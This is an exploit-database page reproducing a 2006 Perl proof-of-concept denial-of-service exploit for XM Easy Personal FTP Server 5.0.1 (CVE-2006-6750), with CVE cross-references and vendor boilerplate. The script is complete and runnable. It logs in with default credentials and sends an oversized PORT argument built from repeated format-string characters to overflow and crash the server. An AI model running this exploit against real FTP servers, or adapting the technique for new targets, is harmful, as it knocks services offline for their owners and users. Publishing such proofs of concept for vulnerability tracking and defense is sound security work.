XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2006-6750 | 27 Dec 200600:00 | – | cve | |
| CVE-2006-6750 | 27 Dec 200600:00 | – | cvelist | |
| EUVD-2006-6733 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-6750 | 27 Dec 200600:28 | – | nvd | |
| CVE-2006-6750 | 21 May 202521:25 | – | redhatcve |
#!/usr/bin/perl
# -----------------------------------------------------------
# Name : XM Easy Personal FTP Server
# Version : 5.0.1
# -----------------------------------------------------------
# Type : dos / remote
# Multiple buffer overflows
# Port and multiple commands with A%n, ...
# -----------------------------------------------------------
# Jerome Athias - https://www.securinfos.info
# -----------------------------------------------------------
use Net::FTP;
$host = @ARGV[0];
if ($host)
{
print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info";
$ftp = Net::FTP->new($host, Debug => 0);
$ftp->login('test','test'); #Maybe anonymous works ;-)
$ftp->port("\x41\x25\x6E"x9999);
}
else {
print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info\n\n- Usage: $0 host\n";
}
# milw0rm.com [2006-06-24]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jun 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02161